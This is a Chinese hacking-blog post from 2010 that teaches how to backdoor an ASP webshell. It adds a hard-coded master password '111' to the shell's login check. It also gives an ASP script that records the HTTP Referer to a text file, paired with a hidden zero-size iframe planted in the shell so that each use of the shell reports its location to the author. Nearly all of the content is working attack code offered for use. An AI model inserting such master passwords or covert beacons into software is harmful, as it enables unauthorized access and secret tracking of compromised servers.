蓝盟诗人[LUC]蓝客联盟

忘记密码

asp大马后门简单添加

2010-10-07 17:06 作者: 来源: 本站 浏览: 1,801 views 我要评论 字号:

正常的:

[php]
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"
[/php]

加油万能密码的:
[html]
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"
[/html]

这样加了万能密码 111 也可以进入

----------------------------------------------------------------------------------------------

这是一段收信的asp代码将其保存为1.asp
[html]
  <%url=Request.ServerVariables("HTTP_Referer")
  set fs=server.CreateObject("Scripting.FileSystemObject")
  set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
  file.writeline url
  file.close
  set file=nothing
  set fs=nothing
  %>
[/html]
  代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
  简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里
  上传到空间比如 http://127.0.0.1/1.asp
  然后里用
[html]  <iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>
[/html]
  插到asp木马中
  那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

**/